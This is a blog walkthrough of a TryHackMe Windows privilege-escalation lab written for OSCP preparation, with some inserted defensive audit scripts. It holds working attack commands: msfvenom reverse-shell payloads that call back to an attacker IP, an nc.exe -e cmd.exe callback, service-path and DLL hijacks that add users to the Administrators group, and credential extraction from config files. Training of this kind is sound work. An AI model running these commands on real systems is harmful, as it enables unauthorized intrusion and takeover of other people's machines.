Windows Priv Esc Arena walkthrough Try HackMe by TCM Security

Ashok Reddy Medikonda
12 min read · Oct 28, 2024


Hello. I'm Ashok. As part of my OSCP certification preparation, I'm doing the TryHackMe machine Windows PrivEsc Arena from the TCM Security Udemy course.

Takeaways from this blog

Today we walk through Windows PrivEsc Arena. The escalation paths covered in this box are Autorun, AlwaysInstallElevated, Registry, Executable Files, Startup Applications, DLL Hijacking, BinPath, Unquoted Service Paths, Hot Potato, and password mining in configuration files.

Windows PrivEsc Arena TryHackMe

Deploy the vulnerable machine

Note: the IP address of the machine may change depending on THM availability.

To connect to the machine:

Command — rdesktop 10.10.53.125 -g 95%

Select the user in the popup, then enter the credentials — user/password321

Open Command Prompt and run:

Command — net user

You will find one user other than the default user: TCM.

Registry Escalation — Autorun

Autoruns is a Sysinternals utility with comprehensive knowledge of auto-starting locations (startup folders, registry run keys, drivers, services and more). It shows which programs are configured to run during system boot or user logon, from Windows default applications to user-installed third-party applications, and in which order.

On the Windows desktop press Win + R and type cmd to open the command prompt, then run:

C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe

It will prompt for the licence agreement; hit Agree and a window like the one below opens. Check which applications run as autorun entries; here the entry calls program.exe under

Microsoft Corporation c:\program files\autorun program\program.exe

Autorun application

Check the permissions on the path C:\Program Files\Autorun Program with accesschk64.exe:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"

This runs AccessChk with -w to check for write permission, -v for verbose output, and -u to suppress errors.

Autorun privileges

If you observe RW Everyone in the output, anyone can replace the file with a malicious file, which is then executed at logon to give a shell.

You can also check with:

icacls "C:\Program Files\Autorun Program"

icacls permissions

Try with the PowerUp script:

Go to the PowerUp folder, Shift + right-click, open a command prompt there and type the three commands below:

powershell.exe -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

It reports that Everyone has write access to the path.

Powerup.ps1 Write-UserAddMSI

Create an msfvenom payload named program.exe to place under the path

“C:\Program Files\Autorun Program”, since that autorun location is writable by Everyone.

msfvenom -p windows/shell_reverse_tcp LHOST=10.6.17.98 LPORT=443 -f exe -o program.exe

Options: -p the payload, LHOST the local host (here the Kali IP address), LPORT the local port, -f the format (exe), -o the output name.

msfvenom payload

1. Start the Python server on Kali.

2. Open Internet Explorer on the Windows machine.

3. Browse to the Kali IP address, in my case http://10.6.17.98/

4. Download program.exe; click Save, not Run.

5. It lands in the Downloads folder; copy the file.

6. Paste it over the original in “C:\Program Files\Autorun Program”.

7. When asked to copy and replace the existing file, click OK.

8. On the Windows target click the Windows logo and, in the Log off section, click Disconnect.

9. Log back in with the administrator credentials TCM/Hacker123.

10. Start a Netcat listener on the Kali machine to catch the shell.

11. Windows asks whether to run the program; since it is an autorun entry, click Run and you will get a shell.

#Kali
python3 -m http.server 80
rlwrap -nlvp 443

It will ask whether to run the file; click OK.

Popup: click Yes

We got a shell as the TCM user

Got Administrator access.

Registry Escalation — AlwaysInstallElevated

“AlwaysInstallElevated” is a Windows Registry setting that affects the behavior of the Windows Installer service. The vulnerability arises when the “AlwaysInstallElevated” registry key is configured with a value of “1” in the Windows Registry.

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

AlwaysInstallElevated is ON when the value is 1; 1 and 0x1 are the same value.

query to AlwaysInstallELevated
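A defender-side check and fix for this setting, added here as an example (not part of the original walkthrough or of PowerUp). Windows Installer only honours the setting when both the machine-policy and the user-policy value are 1, so the script reads both hives before it warns and remediates.

```powershell
# Added example, not part of the original walkthrough. The Installer only
# runs MSI packages as SYSTEM when BOTH the machine policy (HKLM) and the
# user policy (HKCU) value are 1, so a defender's check must read both.
$Keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'

function Get-AlwaysInstallElevatedState {
    $state = [ordered]@{}
    foreach ($k in $Keys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        # A missing key or value behaves as 0 (disabled)
        $state[$k] = if ($null -eq $v) { 0 } else { [int]$v }
    }
    return $state
}

function Disable-AlwaysInstallElevated {
    # Remediation; writing the HKLM value requires an elevated prompt
    foreach ($k in $Keys) {
        if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null }
        Set-ItemProperty -Path $k -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

$state = Get-AlwaysInstallElevatedState
$state.GetEnumerator() | ForEach-Object { '{0} = {1}' -f $_.Key, $_.Value }
if (@($state.Values | Where-Object { $_ -eq 1 }).Count -eq 2) {
    Write-Warning 'AlwaysInstallElevated is effective: any user can install an MSI as SYSTEM'
    Disable-AlwaysInstallElevated
}
```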

Now we can abuse this:

powershell.exe -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

AlwaysInstallElevated registry Key, AbuseFunction: Write-UserAddMSI

PowerUp.ps1 Write-UserAddMSI

Before running it, the members of the Administrators group are Administrator and TCM.

checking administrator group users

Once you run the command

Write-UserAddMSI

It takes some time for the window to pop up. After running, the add-user popup shows default credentials; leave them as they are.

After running net localgroup administrators, the newly created backdoor user is now in the Administrators group.

checking administrator group.

The user was successfully added to the administrator group.

Service Escalation — Registry

Service escalation through the registry: if we have full control over a service's registry key, we can compile a malicious executable written in C that adds a user, point the service's ImagePath at it, and start the service.

Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

NT AUTHORITY\INTERACTIVE has Allow FullControl on the key, and that is our permission.

Now we compile a binary that adds our user to the Administrators group.
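Generalising the Get-Acl check above to every service key, as an added example (not from the original walkthrough): it lists service registry keys where a low-privileged principal can rewrite values such as ImagePath, and includes a remediation helper. The principal list and the regsvc name in the usage comment are assumptions taken from this section.

```powershell
# Added example, not part of the original walkthrough. Lists service registry
# keys on which a low-privileged principal can rewrite values such as
# ImagePath, which is exactly the permission abused in this section.
$LowPriv = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'

function Get-WeakServiceKeyAcl {
    foreach ($key in Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue) {
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            # SetValue alone is enough to rewrite ImagePath; WriteKey and FullControl include it
            if (($ace.AccessControlType -eq 'Allow') -and
                ($LowPriv -contains $ace.IdentityReference.Value) -and
                ("$($ace.RegistryRights)" -match 'SetValue|WriteKey|FullControl')) {
                [pscustomobject]@{
                    Service   = $key.PSChildName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.RegistryRights
                }
            }
        }
    }
}

function Remove-LowPrivServiceKeyAce([string]$Service) {
    # Remediation (elevated prompt): strip explicit Allow ACEs granted to $LowPriv principals.
    # Inherited ACEs are not touched by RemoveAccessRule; fix those on the parent key instead.
    $regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$Service"
    $acl = Get-Acl -Path $regKey
    foreach ($ace in @($acl.Access | Where-Object { $_.AccessControlType -eq 'Allow' -and $LowPriv -contains $_.IdentityReference.Value })) {
        $acl.RemoveAccessRule($ace) | Out-Null
    }
    Set-Acl -Path $regKey -AclObject $acl
}

Get-WeakServiceKeyAcl | Format-Table -AutoSize
# Then, for the key found in this section:  Remove-LowPrivServiceKeyAce -Service regsvc
```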

Download the C file from this link with wget; it contains the line

cmd.exe /k net localgroup administrators user /add

which adds the current user to the Administrators group.

Save the file and compile it with:

x86_64-w64-mingw32-gcc windows_service.c -o x.exe
# If the cross-compiler is missing, install it with
sudo apt install gcc-mingw-w64

Compiled successfully; serve it with the python3 server.

Download x.exe and move it to the temp folder on the Windows C drive (c:\temp).

Before running the commands, check that the Administrators group has TCM, backdoor, and Administrator.

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
sc start regsvc

Due to some issues I restarted the machine; for me the above commands worked in cmd, but when I ran them in PowerShell they failed, so make sure to try both.

We are now in the Administrators group. Revert the Windows machine to try the next attack.

Service Escalation — Executable File

This technique applies whenever you have write access to a service executable. We can check for it in two ways: PowerUp.ps1 and accesschk64.exe.

One way is PowerUp.ps1

powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks

It lists the service executables on which we have write permission.

In this case we have access to this path “C:\Program Files\File Permissions Service”

Another way is accesschk64.exe

In this case you need to already know which path has the full-access permission; in a real engagement you don't, so it is better to run PowerUp.ps1 first and then confirm this way.

accesschk64.exe -wvu "C:\Program Files\File Permissions Service"

Now you can see RW Everyone with FILE_ALL_ACCESS; let's replace that executable with our payload.

Now download the x.exe file and replace filepermsvc.exe in “C:\Program Files\File Permissions Service” with it.

I'm serving the file with the Kali Linux python3 server, downloading it in the Windows browser, then replacing the file.

Downloaded from the browser; while saving I selected the path I wanted, clicked on the file and replaced it.

net localgroup administrators
sc start filepermsvc
net localgroup administrators

Before running sc start filepermsvc, I checked that the Administrators group only had TCM and Administrator.

After running the sc start command, user was added to the Administrators group as well.

If you wonder how I knew the service name filepermsvc: it is the service name that showed up in the PowerUp.ps1 Invoke-AllChecks output.

Escalation Path — Startup Applications

Basically this checks which startup locations grant full permission; the same thing happens with the run command.

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

In the output, notice that the “BUILTIN\Users” group has full access (F) to the directory.

msfvenom -p windows/shell_reverse_tcp LHOST=10.6.17.98 LPORT=443 -f exe -o program.exe

I'm serving the file with the Kali Linux python3 server, downloading it in the Windows browser, then placing it in the path “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”

Disconnect, switch back and connect as the TCM user; we get the shell as TCM.

We got the TCM user's administrator privileges

Escalation Path — DLL Hijacking

DLL hijacking occurs when an attacker tricks a legitimate Windows application into loading and executing a malicious DLL file instead of the intended legitimate DLL.

This allows the attacker to run malicious code within the context of a trusted application.

· The attacker places a malicious DLL file in a location that will be searched before the legitimate DLL.

· When the application starts and attempts to load the DLL, it loads the malicious version first.

· This allows the malicious code to execute with the privileges of the target application.

This GitHub link has all the scripts https://github.com/sagishahar/scripts

In this case I'm using windows_dll.c and placed “cmd.exe /k net localgroup administrators user /add” in the file.

Log in to Windows, open Process Monitor from the tools section with administrator privileges, and set these filters:

Search this way to find which application is looking for a .dll it cannot find; if the DLL location or the application is writable by us, we can get administrator access.

You might wonder how to run Process Monitor with administrator privileges. In this case the WINPREP machine is provided; otherwise use your own Windows machine to check the .dll name, then use that name on the target.

To find the name of the missing .dll, filter on the result NAME NOT FOUND

These are filtered .dll

Change the command, save the file and compile it into a .dll:

x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

Transfer it to Windows by serving it with the Kali Linux python3 server and downloading it with the Windows browser, then restart the service:

sc stop dllsvc
sc start dllsvc

After running the commands, user was successfully added to the Administrators group

Added user into administrator group.

Escalation Path — Binary Paths

PowerUp lists the services; for this exercise we need the Service Permissions section, where the daclsvc service appears.

powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks

Here we can't replace and restart a binary like in the previous cases, so we check the service permissions instead.

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc Everyone *
sc qc daclsvc

Everyone is the group to check; -u suppresses errors, -w checks for write permission, -c treats the name as a service, -v gives verbose output.

We have permission to change the configuration.

The BINARY_PATH_NAME is “C:\Program Files\DACL Service\daclservice.exe”, and we can change the service configuration.

The output shows that the user “User-PC\User” has the SERVICE_CHANGE_CONFIG permission.

Let's try something malicious with the binary path. Before starting the attack, the Administrators group has TCM and Administrator.

Commands

sc config daclsvc binpath= "net localgroup administrators user /add"
sc qc daclsvc
sc start daclsvc
net localgroup administrators

Let's break it down

1. Since we have change-config permission, the first command sets the binary path to a command that adds the user to the Administrators group.

2. Then check that the path is set correctly with sc qc daclsvc

3. Then start the service with sc start daclsvc

4. Check whether the user was added to the Administrators group with net localgroup administrators.

We added user to the Administrators group.

Escalation Path — Unquoted Service Paths

Unquoted Service Path is a Windows Privilege Escalation vulnerability that occurs when the path to a service executable contains spaces and is not properly enclosed in quotations.

We check the permissions along the unquoted path; if we have full permission on one of its directories, we can try this vulnerability.

# Look for Unquoted Service Paths permissions
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks

In the image, check the Unquoted Service Paths section; ignore AWSLiteAgent and go for unquotedsvc and its path

“C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe”

To see the path as it is stored in the registry, press Win+R and type regedit, then open

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\unquotedsvc

Windows searches like this: check how many spaces the path contains, and it will possibly try

C:\Program.exe
C:\Program Files.exe
C:\Program Files\Unquoted.exe
# and so on
C:\Program Files\Unquoted Path Service\Common.exe
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
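An audit script, added as an example (not part of the original walkthrough or of PowerUp), that covers both the Executable File section and this one: for every service it checks whether low-privileged principals can overwrite the binary itself, and for unquoted paths with spaces it walks the CreateProcess candidates listed above and reports any whose directory is writable. The principal list is an assumption based on the groups seen in this walkthrough.

```powershell
# Added example, not part of the original walkthrough. Audits every service
# in the registry for the two file-system weaknesses shown above:
#  - a service binary that low-privileged principals can overwrite
#    (the "Executable File" case), and
#  - an unquoted ImagePath with spaces where a directory earlier in the
#    CreateProcess search order is writable (the "Unquoted Service Paths" case).
$LowPriv = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'

function Test-WritableByLowPriv([string]$Path) {
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if (($ace.AccessControlType -eq 'Allow') -and
            ($LowPriv -contains $ace.IdentityReference.Value) -and
            ("$($ace.FileSystemRights)" -match 'Write|Modify|FullControl')) { return $true }
    }
    return $false
}

function Get-SearchCandidate([string]$Exe) {
    # CreateProcess tries a candidate at every space before the real file:
    # C:\Program.exe, C:\Program Files\Unquoted.exe, ... (the list shown above)
    $parts = $Exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
}

Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\*' -ErrorAction SilentlyContinue |
    Where-Object { $_.ImagePath -match '^"?[A-Za-z]:\\' } |
    ForEach-Object {
        $svc = $_.PSChildName
        $quoted = $_.ImagePath.StartsWith('"')
        # The executable ends at the first ".exe"; anything after it is arguments
        $exe = ($_.ImagePath.Trim('"') -split '(?<=\.exe)')[0]
        if (Test-WritableByLowPriv $exe) {
            "[$svc] binary writable by low-privileged users: $exe"
        }
        if (-not $quoted -and $exe -match ' ') {
            foreach ($c in Get-SearchCandidate $exe) {
                if (Test-WritableByLowPriv (Split-Path $c -Parent)) {
                    "[$svc] unquoted path with writable hijack point: $c"
                }
            }
            # Fix (elevated prompt): quote the path, e.g.  sc config $svc binPath= "\"$exe\""
        }
    }
```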

Let's create the payload using msfvenom

# This command ran successfully but the user was not added to the admin group
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
# This command ran successfully and added the user to the admin group.
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators user /add" -f exe > Common.exe
# You can also try this to get a shell; personally I haven't tried it.
msfvenom -p windows/exec CMD='C:\Users\user\Desktop\nc.exe 10.6.17.98 443 -e cmd.exe' -f exe-service -o common.exe

1. First, on Kali Linux start the Python server with the command python3 -m http.server 80

2. Then open the browser in Windows and type the IP address of the Kali Linux tun0 interface.

3. Save the file into “C:\Program Files\Unquoted Path Service\”.

Common.exe downloaded, next to the Common Files folder.

Let's start the service.

Run sc start unquotedsvc; when the service starts our command is executed and user is added to the Administrators group.

Escalation Path — Potato, Hot Potato

Hot Potato

Hot Potato was the original “potato” exploit, discovered by Stephen Breen in 2016.

It works on Windows 7, 8, 10, Server 2008, and Server 2012.

How Hot Potato Works:

· NBNS Spoofing: Exploits the Windows Name Resolution process to redirect traffic.

· Fake WPAD Proxy Server: Sets up a malicious Web Proxy Auto-Discovery (WPAD) configuration.

· NTLM Relay: Performs HTTP to SMB NTLM relay to create an elevated process.

https://github.com/Kevin-Robertson/Tater/tree/master

https://jlajara.gitlab.io/Potatoes_Windows_Privesc

https://github.com/foxglovesec/Potato/tree/master

Bypass the PowerShell execution policy and import the Tater.ps1 module:

Powershell -ep bypass
Import-Module .\Tater.ps1
net localgroup administrators

Command to run Tater:

Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
# It will take some time to add the user
net localgroup administrators

User was successfully added to the Administrators group.

Escalation Path — Password Mining Escalation — Configuration Files

Passwords are often stored in .txt, .config, .kdbx and .xml files.

# Windows
notepad C:\Windows\Panther\Unattend.xml
# Kali: decode the base64 password found in the file
echo -n "cGFzc3dvcmQxMjM=" | base64 -d
password123

We already know this password.

The remaining two escalations have already been completed in the Udemy course.

Thanks for reading the entire article. Until next time, good luck.

Please feel free to reach out to me on LinkedIn.
